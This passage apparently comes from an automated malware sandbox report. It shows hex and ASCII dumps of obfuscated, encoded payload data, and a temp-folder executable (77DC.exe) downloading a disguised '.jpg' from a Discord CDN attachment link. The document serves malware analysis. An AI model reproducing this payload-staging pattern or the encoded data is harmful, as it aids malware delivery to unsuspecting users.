4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 70 45 20
                                                            Data Ascii: O MM O pE O qOM O qOE O qOX O qqD O qqW O qqm O MX O ME O qOO O pE O qqq O pE O qOX O qqE O qJO O qOD O MM O qOJ O qqW O qJO O qqD O qqm O qqq O qJO O pE O qqO O pE O qqX O qOE O qqM O MX O MX O qqM O MM O qqJ O qJJ O pE O qOJ O pE O MX O qOJ O qOO O pE
                                                            2021-10-29 18:10:39 UTC1205INData Raw: 4d 20 4f 20 4d 4d 20 4f 20 71 4f 57 20 4f 20 71 4f 71 20 4f 20 71 71 57 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 57 20 4f 20 71 71 45 20 4f 20 71 71 57 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4a 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 71 20 4f 20 4d 45 20 4f 20 4d 45 20 4f 20 71 4f 71 20 4f 20 4d 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 70 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4f 4d 20 4f 20 70 45 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 71 4f 4a 20 4f
                                                            Data Ascii: M O MM O qOW O qOq O qqW O qqJ O qOp O qqO O qOW O qqE O qqW O qOJ O pE O qOJ O pE O qOO O qqJ O qqW O MX O qqO O qqq O ME O ME O qOq O ME O qOW O pE O qOW O pE O qqm O qqO O qOE O qOX O qOp O qqO O qOM O qOp O qOW O qOp O qOM O pE O qOp O pE O MM O qOJ O
                                                            2021-10-29 18:10:39 UTC1209INData Raw: 4f 20 4f 20 71 4a 4f 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 71 4f 57 20 4f 20 71 4a 71 20 4f 20 4d 45 20 4f 20 71 4f 70 20 4f 20 71 71 71 20 4f 20 71 4f 70 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 4d 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 45 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 4f 4a 20 4f 20 71 4f 71 20 4f 20 71 4f 70 20 4f 20 71 71 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 4d 45 20 4f 20 71 4f 58 20 4f 20 71 71 4d 20 4f 20 71 4f 44 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 45 70 20 4f 20 70 45 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 4d 58 20 4f 20 71 4f 6d 20 4f 20 71
                                                            Data Ascii: O O qJO O qqO O pE O qOW O pE O qOX O qOE O qOW O qJq O ME O qOp O qqq O qOp O qOO O qqX O MM O qOO O qOE O qqq O pE O qOp O pE O qJq O qOJ O qOq O qOp O qqE O qqW O pE O pJ O pE O qqW O ME O qOX O qqM O qOD O qJq O pE O Ep O pE O qqm O qqp O MX O qOm O q
                                                            2021-10-29 18:10:39 UTC1213INData Raw: 4f 20 71 4a 4a 20 4f 20 4d 45 20 4f 20 71 4f 57 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 71 71 6d 20 4f 20 71 71 57 20 4f 20 71 71 45 20 4f 20 71 71 71 20 4f 20 71 4f 44 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 71 4f 71 20 4f 20 71 71 45 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 4d 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 71
                                                            Data Ascii: O qJJ O ME O qOW O MX O pE O qOX O pE O qOX O qJO O MM O qqm O qqW O qqE O qqq O qOD O qqq O pE O qOq O pE O qqJ O qOp O qOq O qqE O pE O qqW O pE O qOD O qqE O qOO O qOD O qOW O pE O MJ O pE O qOO O qOD O qOm O qOO O qOJ O MX O qOX O qJJ O qOO O qOD O qq
                                                            2021-10-29 18:10:39 UTC1229INData Raw: 4a 20 4f 20 71 4a 70 20 4f 20 57 4a 20 4f 20 44 58 20 4f 20 57 71 20 4f 20 57 6d 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 57 6d 20 4f 20 57 44 20 4f 20 6d 57 20 4f 20 44 4d 20 4f 20 57 71 20 4f 20 57 4f 20 4f 20 57 70 20 4f 20 6d 57 20 4f 20 6d 4d 20 4f 20 6d 4d 20 4f 20 44 45 20 4f 20 44 4d 20 4f 20 6d 57 20 4f 20 44 44 20 4f 20 45 4f 20 4f 20 44 45 20 4f 20 6d 4d 20 4f 20 6d 57 20 4f 20 6d 58 20 4f 20 57 44 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 57 4f 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 6d 4d 20 4f 20 6d 58 20 4f 20 57 71 20 4f 20 6d 4d 20 4f 20 57 44 20 4f 20 71 4a 57 20 4f 20 4d 4a 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 71 20 4a 71 20 44 58 20 4f 20 71 71 6d 20 4f 20 71 4f 57 20 4f 20 71 71 58 20 4f 20 71 4f 71 20 4f 20
                                                            Data Ascii: J O qJp O WJ O DX O Wq O Wm O DM O WE O Wm O WD O mW O DM O Wq O WO O Wp O mW O mM O mM O DE O DM O mW O DD O EO O DE O mM O mW O mX O WD O mX O mX O WO O DD O DM O mM O mX O Wq O mM O WD O qJW O MJ O mX O mX O mX O mX O q Jq DX O qqm O qOW O qqX O qOq O
                                                            2021-10-29 18:10:39 UTC1245INData Raw: 20 4a 20 4a 20 58 20 4a 20 4a 20 4a 20 71 70 20 4f 20 6d 20 71 45 20 71 4a 4d 20 4a 57 20 71 6d 20 71 6d 20 71 45 20 71 4a 4d 20 4a 4d 20 71 45 20 71 4a 4d 20 70 70 20 44 20 4f 20 71 20 71 6d 20 71 45 20 71 4a 4d 20 70 45 20 44 20 4f 20 71 20 71 58 20 71 4a 58 20 71 70 45 20 71 6d 20 45 20 45 20 57 20 58 20 58 20 58 20 71 4f 20 4a 20 70 20 4f 20 4f 20 58 20 4a 45 20 45 20 71 70 20 58 20 58 20 58 20 71 58 20 71 4a 4d 20 6d 57 20 71 58 20 71 4a 4d 20 6d 4d 20 71 58 20 71 4a 4d 20 57 70 20 71 58 20 71 4a 4d 20 57 45 20 4a 20 4a 20 71 58 20 71 4a 4d 20 57 70 20 71 58 20 71 4a 4d 20 57 45 20 4a 20 4a 20 57 20 70 4a 20 4f 20 71 58 20 71 4a 4d 20 6d 4d 20 57 20 70 4a 20 4f 20 71 58 20 71 4a 4d 20 57 70 20 57 20 70 4a 20 4f 20 71 58 20 71 4a 4d 20 57 45 20 6d 20
                                                            Data Ascii: J J X J J J qp O m qE qJM JW qm qm qE qJM JM qE qJM pp D O q qm qE qJM pE D O q qX qJX qpE qm E E W X X X qO J p O O X JE E qp X X X qX qJM mW qX qJM mM qX qJM Wp qX qJM WE J J qX qJM Wp qX qJM WE J J W pJ O qX qJM mM W pJ O qX qJM Wp W pJ O qX qJM WE m


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.549808162.159.133.233443C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-29 18:10:44 UTC1254OUTGET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1
                                                            Host: cdn.discordapp.com
                                                            Connection: Keep-Alive
                                                            2021-10-29 18:10:44 UTC1254INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:44 GMT
                                                            Content-Type: image/jpeg
                                                            Content-Length: 406075
                                                            Connection: close
                                                            CF-Ray: 6a5e5cc34bd74321-FRA
                                                            Accept-Ranges: bytes
                                                            Age: 835
                                                            Cache-Control: public, max-age=31536000
                                                            ETag: "4be3e6f4d4f4aa1116f6c74f532cbeb7"
                                                            Expires: Sat, 29 Oct 2022 18:10:44 GMT
                                                            Last-Modified: Fri, 29 Oct 2021 17:49:11 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: HIT
                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Cf-Bgj: h2pri
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            x-goog-generation: 1635529751768404
                                                            x-goog-hash: crc32c=bHQJMA==
                                                            x-goog-hash: md5=S+Pm9NT0qhEW9sdPUyy+tw==
                                                            x-goog-metageneration: 1
                                                            x-goog-storage-class: STANDARD
                                                            x-goog-stored-content-encoding: identity
                                                            x-goog-stored-content-length: 406075
                                                            X-GUploader-UploadID: ADPycdtQMHGyEhnppJ8P837WdZk3TFi4GDGE6cytjZ9NP8ck3B0QplKsdro4zTxd-YyGcioOy6QRjSQ8JvbrhdjjkmE
                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=po%2B0%2BWnXBj6l5K5lXZDbUx9aRTa0BY76Msql9sBv%2FJPPUr%2FJkGS%2BWoBGsA8MtNSGdFfCL%2FumlVxPQFeJAX4Fn7hFxp8a9FHXPyetwpQYDy5DM%2B7d%2FZgL3Lc4PzwhgrR5wuAbjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            2021-10-29 18:10:44 UTC1255INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                            2021-10-29 18:10:44 UTC1255INData Raw: 43 4e 56 4c 72 59 63 4d 49 57 2d 4d 4d 20 57 43 20 4e 72 72 20 43 20 4c 20 43 20 43 20 43 20 72 20 43 20 43 20 43 20 56 59 59 20 56 59 59 20 43 20 43 20 4e 49 72 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 63 72 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 4e 56 49 20 43 20 43 20 43 20 4e 72 20 4c 4e 20 4e 49 63 20 4e 72 20 43 20 4e 49 43 20 57 20 56 43 59 20 4c 4c 20 4e 49 72 20 4e 20 4d 63 20 56 43 59 20 4c 4c 20 49 72 20 4e 43 72 20 4e 43 59 20 4e 4e 59 20 4c 56 20 4e 4e 56 20 4e 4e 72 20 4e 4e 4e 20 4e 43 4c 20 4e 4e 72 20 57 4d 20 4e 43 57 20 4c 56 20 57 57 20 57 4d 20 4e 4e 43 20 4e
                                                            Data Ascii: CNVLrYcMIW-MM WC Nrr C L C C C r C C C VYY VYY C C NIr C C C C C C C cr C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C NVI C C C Nr LN NIc Nr C NIC W VCY LL NIr N Mc VCY LL Ir NCr NCY NNY LV NNV NNr NNN NCL NNr WM NCW LV WW WM NNC N
                                                            2021-10-29 18:10:44 UTC1256INData Raw: 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 56 59 20 72 43 20 56 56 57 20 4e 43 57 20 4e 4e 59 20 59 43 20 72 49 20 59 43 20 59 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 72 63 20 4e 72 4c 20 59 43 20 72 49 20 4e 4c 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4e 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20
                                                            Data Ascii: C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C VY rC VVW NCW NNY YC rI YC YC Ir NNr NNM Nrc NrL YC rI NLI Yr Ir NNr NNM NCW NNV YC NNV YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC
                                                            2021-10-29 18:10:44 UTC1258INData Raw: 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 59 63 20 4e 49 4c 20 59 59 20 49 72 20 4e 4e 72 20 49 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 72 20 59 4e 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 49 20 59 72 20 49 72 20 4e 49 20 57 4e 20 4c 4e 20 4c 20 63 72 20 49 4c 20 59 43 20 59 72 20 49 72 20 4e 4d 49 20 4e 4e 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 72 43 20 59 4e 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 57 43 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 59 4c 20 4e 43 57 20 4e 4e 56
                                                            Data Ascii: N NCW NNV YC NYc NIL YY Ir NNr IY NCW NNV YC NIr YN Yr Ir NNI NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI NI Yr Ir NI WN LN L cr IL YC Yr Ir NMI NNI NCW NNV YC VrC YN Yr Ir NNI NNM NCW NNV NWC rW YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr YL NCW NNV
                                                            2021-10-29 18:10:44 UTC1259INData Raw: 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20
                                                            Data Ascii: NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC
                                                            2021-10-29 18:10:44 UTC1260INData Raw: 4e 4e 56 20 59 63 20 4c 57 20 4c 4d 20 72 4d 20 56 4e 4d 20 72 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 56 4c 20 4c 49 20 63 72 20 59 59 20 49 72 20 4e 4e 72 20 59 20 4c 4e 20 72 4e 20 59 43 20 72 49 20 63 63 20 4d 56 20 4d 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 49 49 20 72 59 20 72 49 20 59 43 20 63 43 20 56 72 63 20 49 4d 20 57 49 20 4c 4e 20 4e 20 59 43 20 72 49 20 63 63 20 63 49 20 56 59 4e 20 4e 4e 72 20 4e 4e 4d 20 56 57 20 4e 72 20 72 72 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4e 72 72 20 56 4e 20 72 56 20 63 49 20 4e 72 4d 20 4e 4e 72 20 4e 4e 4d 20 56 57 20 56 20 59 4c 20 72 57 20 59 43 20 4d 43 20 72 56 20 4e 43 49 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 72 4d 20 59 43 20 59 72 20 57
                                                            Data Ascii: NNV Yc LW LM rM VNM rV NNM NCW NNL VL LI cr YY Ir NNr Y LN rN YC rI cc MV Mr NNr NNM NCL II rY rI YC cC Vrc IM WI LN N YC rI cc cI VYN NNr NNM VW Nr rr rI YC cC NVr NCW NNM NCW NVV Nrr VN rV cI NrM NNr NNM VW V YL rW YC MC rV NCI NNM NCW NVV Vc rM YC Yr W
                                                            2021-10-29 18:10:44 UTC1262INData Raw: 43 4c 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4e 4e 72 20 59 43 20 72 49 20 56 59 20 49 57 20 4e 4e 56 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 59 20 4c 4c 20 59 72 20 56 43 43 20 49 56 20 4e 63 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 63 59 20 4c 43 20 59 43 20 59 72 20 57 72 20 4e 56 20 4e 4c 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 4e 20 4c 4e 20 4c 4c 20 4e 4e 72 20 4e 56 20 4e 72 56 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 43 63 20 59 56 20 56 4c 59 20 49 59 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 57 59 20 59 43 20 72 49 20 59 63 20 4e 57 20 56 4e 56 20 4e 72 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 63 20 59 4e 20 59 43 20 59 72 20 4e 56 4d 20 56 57 20 57 59 20 4e 43 49 20 4e 4e 56 20 59 56 20 4c 4c 20 59 59 20 4c 57 20 49 43 20 4e 72
                                                            Data Ascii: CL Ir NNr NNL cW NNr YC rI VY IW NNV NNY NNM NCM WM YY LL Yr VCC IV Ncr NNc NCW NNI cY LC YC Yr Wr NV NLW NCW NNV Yr VN LN LL NNr NV NrV NCW NNV Yr VCc YV VLY IY NNr NNY LC WY YC rI Yc NW VNV NrC NNM NCW NNc Vc YN YC Yr NVM VW WY NCI NNV YV LL YY LW IC Nr
                                                            2021-10-29 18:10:44 UTC1263INData Raw: 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 57 43 20 4d 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 57 20 59 4c 20 4c 43 20 4e 4e 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 4c 20 59 4c 20 59 72 20 63 4c 20 56 4c 59 20 4e 56 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 56 63 20 59 63 20 59 43 20 59 72 20 49 56 20 4e 56 63 20 4e 4e 72 20 4c 43 20 56 4e 57 20 59 43 20 72 49 20 59 56 20 4c 4d 20 49 43 20 57 57 20 4e 4e 4c 20 4e 4e 4c 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 56 56 56 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 4c 59 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4d 59 20 4e 43 56 20 4c 4c 20 59 4c 20 4e
                                                            Data Ascii: NVV cY I YC Yr Wr WC Mc NCW NNV Yc YW YL LC NNC NNr NNM NCL WL YL Yr cL VLY NVM NNY NNM NCW NNr Vc Yc YC Yr IV NVc NNr LC VNW YC rI YV LM IC WW NNL NNL VYL NCr rI YC YY NNL NcV VVV NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI WL NLY Ir NNr NNY MY NCV LL YL N
                                                            2021-10-29 18:10:44 UTC1264INData Raw: 20 72 49 20 59 56 20 59 72 20 49 72 20 4e 4e 72 20 4c 49 20 4e 43 49 20 4e 4e 56 20 59 43 20 4e 43 59 20 59 4e 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 63 4e 20 72 49 20 59 43 20 59 59 20 4d 57 20 63 63 20 4e 4e 59 20 4e 43 57 20 59 56 20 72 49 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 43 43 20 4c 43 20 4d 57 20 59 43 20 72 49 20 59 63 20 63 43 20 49 63 20 4e 4e 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 56 4c 43 20 4e 72 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 49 49 20 59 20 72 49 20 59 43 20 63 43 20 4c 57 20 4d 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 57 20 59 43 20 59 72 20 57 72 20 4e 56 4e 20 4e 4e 72 20 63 57 20 4d 72 20 59 43 20 72 49 20 59 63 20 56 4d 20 49 4c 20 4e 4e 63
                                                            Data Ascii: rI YV Yr Ir NNr LI NCI NNV YC NCY YN Yr Ir NNL NNM NCW NNV cN rI YC YY MW cc NNY NCW YV rI rI YC YL Ir NNr NCC LC MW YC rI Yc cC Ic NNN VrI YY NNV YC rW VL VLC NrC NNr NNM NCY II Y rI YC cC LW Mr NNM NCW NVV Vc W YC Yr Wr NVN NNr cW Mr YC rI Yc VM IL NNc
                                                            2021-10-29 18:10:44 UTC1266INData Raw: 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 56 4e 72 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 20 4d 56 20 59 4e 20 72 49 20 59 56 20 4c 57 20 49 4c 20 57 57 20 4e 4e 4c 20 4e 56 72 20 4e 4e 4d 20 72 59 20 63 4c 20 4e 57 4e 20 4e 43 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4d 56 20 4e 63 43 20 4e 59 59 20 72 49 20 59 43 20 59 43 20 4e 56 72 20 63 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 56 57 20 56 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 63 20 56 63 20 72 49 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 20 4d 72 20
                                                            Data Ascii: NNr NNM NCI IY VVc VNr YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM V MV YN rI YV LW IL WW NNL NVr NNM rY cL NWN NCI Ir NNr NNc MV NcC NYY rI YC YC NVr cW NNM NCW NVV cY I YC Yr Wr VW VNM NCW NNV YV Yc Vc rI Ir NNr NNY V Mr
                                                            2021-10-29 18:10:44 UTC1267INData Raw: 20 4e 49 4d 20 4e 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 4e 4c 56 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 56 63 20 4e 4e 57 20 4c 59 20 59 59 20 72 4c 20 4e 49 4d 20 4e 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 4e 59 57 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 72 59 20 4e 4e 56 20 59 43 20 59 49 20 4c 4e 20 72 4e 20 63 57 20 4e 4e 4d 20 4e 43 49 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e 20 4e 57 20 4e 4c 56 20 4e 72 72
                                                            Data Ascii: NIM Nr NNr NNM NCI IY VVc NLV YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM NVc NNW LY YY rL NIM Nr NNr NNM NCI IY VVc NYW YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc rY NNV YC YI LN rN cW NNM NCI VVr rV YC rI YN NW NLV Nrr
                                                            2021-10-29 18:10:44 UTC1268INData Raw: 20 4e 72 20 63 57 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 43 43 20 4c 4c 20 59 72 20 4c 59 20 59 43 20 63 57 20 4e 4e 57 20 4e 43 63 20 4e 56 43 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 59 4d 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 59 72 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 43 4e 20 49 49 20 59 56 20 72 49 20 59 43 20 72 49 20 4c 49 20 4e 20 4e 4e 57 20 4e 43 57 20 43 20 4d 63 20 72 63 20 59 43 20 59 72 20 57 72 20 56 57 20 4e 43 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 4c 59 20 59 4c 20 63 57 20 4e 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 57 20 59 49 20 4c 4c 20 59 49 20 4c 57 20 49 43 20 57 57 20 4e 4e 56 20 4e
                                                            Data Ascii: Nr cW NNY NNM NCW NCC LL Yr LY YC cW NNW NCc NVC VYL NCr rI YC YY NNL NcV NYM NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI WL NYr Ir NNr NNY NCN II YV rI YC rI LI N NNW NCW C Mc rc YC Yr Wr VW NCc NCW NNV Yc LY YL cW Nc NNY NNM NCM WW YI LL YI LW IC WW NNV N
